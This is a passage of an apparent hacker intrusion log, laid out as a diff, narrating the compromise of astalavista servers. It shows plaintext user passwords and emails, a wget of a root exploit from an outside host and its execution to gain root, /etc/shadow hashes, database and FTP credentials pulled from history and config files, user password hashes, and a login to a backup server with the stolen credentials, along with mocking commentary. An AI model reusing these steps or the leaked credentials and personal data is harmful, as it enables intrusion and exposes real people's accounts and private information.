+| Glafkos Charalambous     | anonymous2086        | si99490178$#     | nowayout@webhostline.com          |
+| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | ivan.schmid@astalavista.ch        |
+| Peter Fisher             | cyph3r1              | testZer025435    | cyph3r@astalavista.com            |
+| sykadul                  | sykadul              | ak29eral         | sykadul@gmail.com                 |
+| Ronny Janzi              | commander1           | mpbdaagf6m       | ronny.janzi@astalavista.ch        |
++--------------------------+----------------------+------------------+-----------------------------------+
+27 rows in set (0.00 sec)
+
+mysql> exit;
+Bye
+
+[~] plaintext passwords? yes, 
+	Those so called "security professionals" who charge you $6.66 / month to
+	register at their hack-proof portal, save your passwords in plaintext...
+	brilliant!
+
+
+[~] This been fun but we want more.
+
+sh-3.2$ uname -a
+Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
+sh-3.2$ wget http://anti.sec.labs/g0troot
+--13:33:37--  http://anti.sec.labs/g0troot
+Resolving anti.sec.labs... 13.33.33.37
+Connecting to anti.sec.labs|13.33.33.37|:80... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 18200 (18K) [text/plain]
+Saving to: `g0troot'
+
+100%[=========================================================================================================================================>] 18,200      58.6K/s   in 
+0.3s
+
+18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]
+
+sh-3.2$ ./g0troot -i x86_64
+	[+] g0troot - anti.sec.labs
+	[+] Target: 2.6.18-128.1.10.el5
+	[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
+	
+	[+] r00tr00t
+	[~] Executing shell...
+	
+sh-3.2# id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+
+sh-3.2# cat /etc/shadow
+root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
+[snip]
+admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
+jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
+com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
+astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
+
+sh-3.2# cat /etc/motd
+#####################################################
+#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
+# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
+# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #
+#                                                   #
+#####################################################
+#                                                   #
+# Admin Contact - support@secureservertech.com      #
+#                                                   #
+# Available ShortCuts                               #
+#                                                   #
+# nst -  list active connections                    #
+# ddos - shows how many times each ip is connected  #
+# ltr -  restart the webserver                      #
+# phpc - edit the php config file                   #
+# htc -  edit the webserver configuration file      #
+# up -   uptime                                     #
+# etd - edit the motd of the day file               #
+# htr - start and restart apache if needed          #
+# syng - shows active SYN_RECV connections          #
+# synd - syn flood blocker - "synd -h" for usage    #
+#####################################################
+# NOTES:                                            #
+# Last Upgrade - 12-08-2008 by JF                   #
+# My.cnf/Mysql Optimization - 1-28-09               #
+#                                                   #
+#                                                   #
+#                                                   #
+#####################################################
+
+sh-3.2# lastlog | grep -v Never
+Username         Port     From             Latest
+root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009
+admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008
+com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
+astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
+
+sh-3.2# ls -la
+total 453376
+drwxr-x--- 15 root root       4096 Jun  4 08:40 .
+drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
+-rw-r--r--  1 root root    2394400 Oct 19  2007 10mbtest.zip
+-rw-------  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
+-rw-------  1 root root      16836 Jun  4 07:21 .bash_history
+-rw-r--r--  1 root root         24 Jan  6  2007 .bash_logout
+-rw-r--r--  1 root root        191 Jan  6  2007 .bash_profile
+-rw-r--r--  1 root root        176 Jan  6  2007 .bashrc
+-rwx------  1 root root       1899 Oct 28  2007 bk.sh
+-rw-r--r--  1 root root       1327 Nov 29  2007 cert
+-rw-r--r--  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql
+drwxr-xr-x  4 root root       4096 May 20  2008 .cpan
+-rw-r--r--  1 root root        100 Jan  6  2007 .cshrc
+-rw-r--r--  1 root root     323079 Mar 31 13:48 defaultp_ports.sql
+drwx------  2 root root       4096 Oct 28  2007 .elinks
+drwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1
+-rw-r--r--  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2
+-rw-------  1 root root          0 Apr 16 13:19 .history
+-rw-r--r--  1 root root      16095 Sep 11  2007 install.log
+-rw-r--r--  1 root root       2566 Sep 11  2007 install.log.syslog
+-rw-r--r--  1 root root       1003 Jul 22  2007 install.sh
+-rw-------  1 root root         35 Jun  2 14:23 .lesshst
+drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp
+drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
+-rw-r--r--  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz
+-rw-r--r--  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2
+-rwx------  1 root root        760 Sep 18  2008 lp
+drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1
+-rw-r--r--  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
+-rw-r--r--  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
+drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9
+-rw-r--r--  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
+drwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3
+-rw-r--r--  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
+-rw-r--r--  1 root root      25316 Feb 15  2006 mybk.sh
+-rw-------  1 root root         41 Oct 19  2007 .my.cnf
+-rw-------  1 root root       2902 Jun  4 08:40 .mysql_history
+-rwx------  1 root root      38873 Apr 16  2008 mysqlreport
+-rw-------  1 root root         41 May 20  2008 .mytop
+drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
+-rw-r--r--  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
+drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp
+-rw-------  1 root root       1462 Sep 21  2007 opt.php
+-rw-r--r--  1 root root       3371 Sep 22  2007 p
+-rw-r--r--  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2
+-rw-------  1 root root       1024 Feb  3 21:32 .rnd
+-rw-r--r--  1 root root        716 Nov 28  2007 server.csr
+-rw-r--r--  1 root root        887 Nov 28  2007 server.key
+drwx------  2 root root       4096 Oct 10  2008 .ssh
+-rw-r--r--  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
+-rw-r--r--  1 root root        129 Jan  6  2007 .tcshrc
+-rw-r--r--  1 root root  104874307 Oct 17  2007 test100.zip
+-rw-r--r--  1 root root   67085540 Oct 19  2007 test100.zip.1
+drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
+-rw-r--r--  1 root root      42596 May 21  2007 tuning-primer.sh
+drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
+-rw-r--r--  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
+-rw-------  1 root root      12997 May 16  2008 .viminfo
+
+sh-3.2# cat .bash_history
+[snip]
+wget cp4sst.com/sstlinux.tar.gz
+tar zxvf sstlinux.tar.gz
+cd linux-2.6.27.10
+sh install.sh
+make bzImage ; make modules ; make modules_install ; make install
+make clean
+service mysqld restart
+[snip]
+cd /usr/sbin/
+chmod 4777 traceroute
+chmod 4777 ping
+traceroute -I www.astalavista.ch
+[snip]
+vi /etc/csf/csf.conf
+traceroute google.ch
+service csf restart
+tracert google.ch
+service csf restart
+traceroute www.google.ch
+tracert www.google.ch
+traceroute www.google.ch
+locate traceroute
+chown 4755 /bin/traceroute
+chown 4777 /bin/traceroute
+locate ping
+chown 4755 /bin/ping
+chown 4777 /bin/ping
+cd /bin/
+ls -ali | grep ping
+chown root ping
+chmod 4755 ping
+ls -ali | grep traceroute
+chown root traceroute
+chmod 4755 traceroute
+ls -ali | grep traceroute
+traceroute -I www.google.ch
+traceroute www.google.ch
+whois pmsantos.ch
+[snip]
+mysql -h com_contrexx2_live < /root/defaultp_ports.sql
+mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
+mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
+mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
+top
+ping ssth.ch
+ping asdlkfaljgasd???ljg???lasj.ch
+ping asdlkfaljgasdlasj.ch
+ping www.ssth.ch
+ping ssth.ch
+nslookup www.google.ch
+nslookup www.ssth.ch
+man nslookup
+ping www.google.ch
+nslookup www.google.ch
+nslookup www.google.ch
+nslookup salfjasdlf.ch
+[snip]
+openssl passwd -1 sadf
+openssl passwd -1 5cZNHstdTy
+mysql
+mysql
+locate proftp
+vi /etc/proftpd.passwd
+service proftpd restart
+locate proftpd.conf
+vi /etc/proftpd.conf
+vi /etc/proftpd.passwd
+service proftpd restart
+[snip]
+/bin/sh /home/com/backup_system/backup.sh
+tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
+mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
+mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
+ls -ali
+mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
+mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
+crontab -l
+crontab -l
+php -q /home/com/public_html/modifications/cronjobs/securitynews.php
+/home/com/public_html/modifications/cronjobs/exploits.sh
+wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz
+tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
+cd lsws-4.0.3
+sh install.sh
+uptime
+hdparm -tt /dev/sda
+iostat
+yum install iostat
+iostat
+whereis iostat
+yjm clean all
+yum clean all ; yum -y update
+iostat
+yum install systat
+rpm -qa | grep iostat
+rpm -qa | grep sysstat
+rpm -qa | grep systat
+dmesg -c
+sysctl -p
+uname -r
+cd /usr/src
+wget nix101.com/kernels/sstlinux.tar.gz
+shutdown -r now
+nano -w /boot/grub/grub.conf
+
+sh-3.2# cat .my.cnf
+[client]
+user=da_admin
+password=X9dctmRH
+
+sh-3.2# cat /home/com/backup_system/backup.sh
+#!/bin/sh
+#####################################################################
+#                                                                   #
+#   incremental backup for astalavista.com                          #
+#                                                                   #
+#   author:    Paulo M. Santos        #
+#                                                                   #
+#####################################################################
+[snip]
+PROG_DIR="/home/com/backup_system";
+BACKUP_DIR="/home/com/backups";
+DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
+# ftp for synology backup server
+FTP_HOST="212.254.194.163";
+FTP_PORT="21";
+FTP_USER="astalavista.com";
+FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
+FTP_DIR="/astalavista.com";
+# database
+DB_HOST="localhost";
+DB_USER="contrexxuser2";
+DB_PASS="0fEYNZgXz1pKe";
+DB_DATABASE1="com_contrexx2_live";
+DB_DATABASE2="com_contrexx2";
+[snip]
+ftp -in $FTP_HOST $FTP_PORT < ./domains/astalavista.net/public_html
+-rw-r-----  1 astanet mail      34 Dec 22 12:41 .shadow
+
+sh-3.2# cd auth/
+sh-3.2# ls -la
+total 28
+drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
+drwx--x--x 6 astanet astanet 4096 Jun  4 09:51 ..
+-rw-r--r-- 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php
+-rw-r--r-- 1 root    root     319 Jan  5  2006 hosting.config.inc.php
+-rw-r--r-- 1 root    root      24 Jun  4 09:38 .htadm_pwd
+-rw-r--r-- 1 root    root      49 Jan  5  2006 .htpasswd_newhosting
+-rw-r--r-- 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
+
+sh-3.2# cat hackercontest.config.inc.php
+
+sh-3.2# cat hosting.config.inc.php
+
+
+sh-3.2# cd ..
+sh-3.2# cd com
+sh-3.2# ls -la
+total 141208
+drwx--x--x 10 com  com       4096 Apr 28 12:40 .
+drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..
+drwx------  2 com  com       4096 Jun  4 04:04 backups
+-rw-r--r--  1 root root   2419504 Sep 28  2007 backup.sql
+drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
+-rw-------  1 com  com      21880 Jun  2 08:07 .bash_history
+-rw-r--r--  1 com  com         24 Sep 24  2007 .bash_logout
+-rw-r--r--  1 com  com        176 Sep 24  2007 .bash_profile
+-rw-r--r--  1 com  com        124 Sep 24  2007 .bashrc
+drwx--x--x  3 com  com       4096 Jan 29  2008 domains
+-rw-r--r--  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed
+drwxrwx---  3 com  mail      4096 Jan  6 19:24 imap
+-rw-------  1 com  com         69 Nov 18  2008 .lesshst
+drwx------  2 com  com       4096 Sep 24  2007 mail
+-rw-------  1 com  com      13970 Mar 28 21:42 .mysql_history
+drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
+lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
+-rw-r-----  1 com  mail        34 Sep 24  2007 .shadow
+drwx------  2 com  com       4096 Aug 26  2008 .ssh
+-rwx------  1 com  com       8515 Feb 10  2008 t
+-rw-rw-r--  1 com  com       6265 Feb 11  2008 t.c
+drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
+-rw-rw-r--  1 com  com        617 May 20  2008 .toprc
+-rw-rw-r--  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql
+-rw-------  1 com  com      16629 Mar 28 21:46 .viminfo
+-rw-rw-r--  1 com  com         51 Aug 25  2008 .vimrc
+
+sh-3.2# head t.c
+/*
+ * jessica_biel_naked_in_my_bed.c
+ *
+ * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
+ * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
+ * Stejnak je to stare jak cyp a aj jakesyk rozbite.
+ *
+ * Linux vmsplice Local Root Exploit
+ * By qaaz
+ *
+
+sh-3.2# cd /
+sh-3.2# ls -la
+total 360
+drwxr-xr-x  25 root root   4096 Jun  3 02:43 .
+drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
+-rw-------   1 root root  10240 Jun  3 02:39 aquota.group
+-rw-------   1 root root  10240 Jun  3 02:39 aquota.user
+-rw-r-----   1 root root    819 Jul 17  2008 astalavista.us.db
+-rw-r--r--   1 root root      0 Jun  3 02:43 .autofsck
+-rw-r--r--   1 root root      0 Sep 16  2007 .autorelabel
+drwxr-xr-x   3 root root   4096 Dec 29  2007 backup
+drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin
+drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
+drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
+drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc
+drwxr-xr-x  14 root root   4096 Mar 11 17:56 home
+-rw-r--r--   1 root root  13387 Mar 20  2008 httpd.conf
+drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
+drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64
+drwx------   2 root root  16384 Sep 11  2007 lost+found
+drwxr-xr-x   2 root root   4096 Mar 11 17:56 media
+drwxr-xr-x   2 root root      0 Jun  3 02:43 misc
+drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
+-rw-r--r--   1 root root   5859 Feb  3  2008 mrtg.cfg
+drwxr-xr-x   2 root root      0 Jun  3 02:43 net
+drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
+dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
+drwxr-x---  15 root root   4096 Jun  4 08:40 root
+drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin
+drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
+drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
+drwxr-xr-x  11 root root      0 Jun  3 02:42 sys
+drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
+drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr
+drwxr-xr-x  26 root root   4096 Jun  4 03:16 var
+
+sh-3.2# cd opt
+sh-3.2# ls -la
+total 20
+drwxr-xr-x  3 root root 4096 Mar 11 17:56 .
+drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
+drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws
+
+sh-3.2# cd lsws/
+sh-3.2# ls -la
+total 108
+drwxr-xr-x 15 root   root    4096 Mar 20  2008 .
+drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..
+drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
+drwxr-xr-x 13 root   root    4096 May 29 15:10 admin
+drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate
+drwxr-xr-x  2 root   root    4096 May 29 15:10 bin
+drwx------  4 apache apache  4096 Jun  3 02:43 conf
+drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT
+drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
+drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
+drwxr-xr-x  2 root   root    4096 Sep 15  2008 lib
+-rw-r--r--  1 root   root    6959 May 29 15:10 LICENSE
+-rw-r--r--  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
+-rw-r--r--  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL
+-rw-r--r--  1 root   root    3208 May 29 15:10 LICENSE.PHP
+drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
+drwxr-xr-x  2 root   root    4096 Mar 20  2008 php
+drwx------  2 apache apache  4096 Mar 20  2008 phpbuild
+drwxr-xr-x  3 root   root    4096 Mar 20  2008 share
+-rw-r--r--  1 root   root       6 May 29 15:10 VERSION
+
+sh-3.2# cd conf
+sh-3.2# ls -la
+total 48
+drwx------  4 apache apache 4096 Jun  3 02:43 .
+drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
+drwx------  2 apache apache 4096 Mar 20  2008 cert
+-rw-r--r--  1 apache apache 6668 May 29 15:13 httpd_config.xml
+-rw-------  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
+-rw-r--r--  1 root   apache    0 Jun  3 14:11 .last
+-rw-------  1 apache apache  256 May 29 15:10 license.key
+-rw-------  1 apache apache  256 Mar 21  2008 license.key.old
+-rw-------  1 apache apache 3320 Mar 20  2008 mime.properties
+-rw-------  1 apache apache   20 May 29 15:10 serial.no
+drwx------  2 apache apache 4096 Mar 20  2008 templates
+
+sh-3.2# cat serial.no
+IbDl-oVsO-CKqL-wVRa
+
+sh-3.2# mysql
+Welcome to the MySQL monitor.  Commands end with ; or \g.
+Your MySQL connection id is 286844
+Server version: 5.0.45-community-log MySQL Community Edition (GPL)
+
+Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
+
+mysql> show databases;
++-----------------------+
+| Database              |
++-----------------------+
+| information_schema    |
+| astanet_ads           |
+| astanet_mailing_lists |
+| astanet_mediawiki     |
+| astanet_membersystem  |
+| com_contrexx          |
+| com_contrexx2         |
+| com_contrexx2_live    |
+| da_roundcube          |
+| dolphin               |
+| ideapool              |
+| mysql                 |
+| test                  |
+| yourmaster            |
++-----------------------+
+14 rows in set (0.00 sec)
+
+mysql> use ideapool
+Database changed
+mysql> show tables;
++-----------------------------------+
+| Tables_in_ideapool                |
++-----------------------------------+
+| eventum_columns_to_display        |
+| eventum_custom_field              |
+| eventum_custom_field_option       |
+| eventum_custom_filter             |
+| eventum_customer_account_manager  |
+| eventum_customer_note             |
+| eventum_email_account             |
+| eventum_email_draft               |
+| eventum_email_draft_recipient     |
+| eventum_email_response            |
+| eventum_faq                       |
+| eventum_faq_support_level         |
+| eventum_group                     |
+| eventum_history_type              |
+| eventum_irc_notice                |
+| eventum_issue                     |
+| eventum_issue_association         |
+| eventum_issue_attachment          |
+| eventum_issue_attachment_file     |
+| eventum_issue_checkin             |
+| eventum_issue_custom_field        |
+| eventum_issue_history             |
+| eventum_issue_quarantine          |
+| eventum_issue_requirement         |
+| eventum_issue_user                |
+| eventum_issue_user_replier        |
+| eventum_link_filter               |
+| eventum_mail_queue                |
+| eventum_mail_queue_log            |
+| eventum_news                      |
+| eventum_note                      |
+| eventum_phone_support             |
+| eventum_project                   |
+| eventum_project_category          |
+| eventum_project_custom_field      |
+| eventum_project_email_response    |
+| eventum_project_field_display     |
+| eventum_project_group             |
+| eventum_project_link_filter       |
+| eventum_project_news              |
+| eventum_project_phone_category    |
+| eventum_project_priority          |
+| eventum_project_release           |
+| eventum_project_round_robin       |
+| eventum_project_status            |
+| eventum_project_status_date       |
+| eventum_project_user              |
+| eventum_reminder_action           |
+| eventum_reminder_action_list      |
+| eventum_reminder_action_type      |
+| eventum_reminder_field            |
+| eventum_reminder_history          |
+| eventum_reminder_level            |
+| eventum_reminder_level_condition  |
+| eventum_reminder_operator         |
+| eventum_reminder_priority         |
+| eventum_reminder_requirement      |
+| eventum_reminder_triggered_action |
+| eventum_resolution                |
+| eventum_round_robin_user          |
+| eventum_search_profile            |
+| eventum_status                    |
+| eventum_subscription              |
+| eventum_subscription_type         |
+| eventum_support_email             |
+| eventum_support_email_body        |
+| eventum_time_tracking             |
+| eventum_time_tracking_category    |
+| eventum_user                      |
++-----------------------------------+
+69 rows in set (0.00 sec)
+
+mysql> describe eventum_user;
++-------------------------+------------------+------+-----+---------------------+----------------+
+| Field                   | Type             | Null | Key | Default             | Extra          |
++-------------------------+------------------+------+-----+---------------------+----------------+
+| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |
+| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
+| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |
+| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |
+| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
+| usr_status              | varchar(8)       | NO   |     | active              |                |
+| usr_password            | varchar(32)      | NO   |     |                     |                |
+| usr_full_name           | varchar(255)     | NO   |     |                     |                |
+| usr_email               | varchar(255)     | NO   | UNI |                     |                |
+| usr_preferences         | longtext         | YES  |     | NULL                |                |
+| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
+| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |
+| usr_lang                | varchar(5)       | YES  |     | NULL                |                |
++-------------------------+------------------+------+-----+---------------------+----------------+
+13 rows in set (0.00 sec)
+
+mysql> select usr_full_name,usr_email,usr_password from eventum_user;
++----------------------+-------------------------------+----------------------------------+
+| usr_full_name        | usr_email                     | usr_password                     |
++----------------------+-------------------------------+----------------------------------+
+| system               | system-account@example.com    | 14589714398751513457adf349173434 |
+| Developer (Paulo)    | paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |
+| Be1er0ph0r           | be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |
+| Admin                | pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
+| ADMIN                | admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |
+| USER                 | user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |
+| Glafkos - (nowayout) | glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |
+| Joao                 | joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
+| Pascal               | pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |
+| commander            | commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
+| ishtus               | ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |
+| sykadul              | sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |
+| Zach McElroy         | admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |
+| usb                  | usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |
+| cyph3r               | cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |
++----------------------+-------------------------------+----------------------------------+
+15 rows in set (0.00 sec)
+
+mysql> select iss_description from eventum_issue where iss_id = 43;
++-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 
+|
++-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in... how to do that? well think about it... if a user is watching a movie... he'll be 
+connected for 90 mins... 120mins... so what i propose is something like:
+http://www.surfthechannel.com/
+since they only provide LINKS to the movies they are LEGAL and don't break DMCA rules... so we could do the same... "iframe" the content on our website or use a system 
+like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed... which doesn't 
+break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off 
+if they think it breaks copyright laws and we will remove it... i think that makes it on the border of DMCA...
+
+We could also put advertisement during play on the flash video player itself... extra $$...
+
+By sykadul |
++-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+1 row in set (0.00 sec)
+
+// Money and extra $$ is all they care about. remember that.
+
+mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
++------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+| iss_summary            | iss_description                                                                                                                                                                                                                           
+|
++------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+| Forum for REAL EXPERTS | Hello,
+
+				Ishtus and I,
+
+				Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide 
+ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
+
+				One example a friend of mine from coresecurity.com!
+
+				We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
+
+|
++------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+1 row in set (0.00 sec)
+
+// What an awesome yet original idea Ishtus and him... bring MORE security "experts", thats exactly what the world needs...
+
+mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
++------------------+---------------------------------------------------------------------------------------------+
+| iss_summary      | iss_description                                                                             |
++------------------+---------------------------------------------------------------------------------------------+
+| Website guidance | Virtual Girl which guides you trought the website.
+
+			We need a girl with who you can ( talk )!!!
+			Also for the News!
+			So my suggestion is a girl who read you the news loud if you like!
+			you can choose between read yourselfe or she read it for you or both!
+
+			Go to www.heise.de! There is an example for Voice News! It's a good thing!!!
+
+			Have a look on the example girls!!
+
+			http://www.yaoti.com/de/free_yaoti.html
+
+			or that
+
+			http://www.yellostrom.de/
+
+|
++------------------+---------------------------------------------------------------------------------------------+
+1 row in set (0.00 sec)
+
+// ha ha.
+
+mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
++--------------------------+-----------------------------------------------------------------------------------------------------------+
+| iss_summary              | iss_description                                                                                           |
++--------------------------+-----------------------------------------------------------------------------------------------------------+
+| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |
++--------------------------+-----------------------------------------------------------------------------------------------------------+
+1 row in set (0.00 sec)
+
+// LOL.
+
+mysql> exit
+Bye
+
+
+sh-3.2# ftp 212.254.194.163
+Connected to 212.254.194.163.
+220 BackupCOM_VW FTP server ready.
+504 AUTH: security mechanism 'GSSAPI' not supported.
+504 AUTH: security mechanism 'KERBEROS_V4' not supported.
+KERBEROS_V4 rejected as an authentication type
+Name (212.254.194.163:root): astalavista.com
+331 Password required for astalavista.com.
+Password:
+230 User astalavista.com logged in.
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> ls -la
+227 Entering Passive Mode (212,254,194,163,2,188)
+150 Opening BINARY mode data connection for 'file list'.
+dr-x------   1 root users         4096 Jun  4 06:13 astalavista.com
+226 Transfer complete.
+ftp> cd astalavista.com
+250 CWD command successful.
+ftp> ls -la
+227 Entering Passive Mode (212,254,194,163,2,189)
+150 Opening BINARY mode data connection for 'file list'.
+-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
+-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
+-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
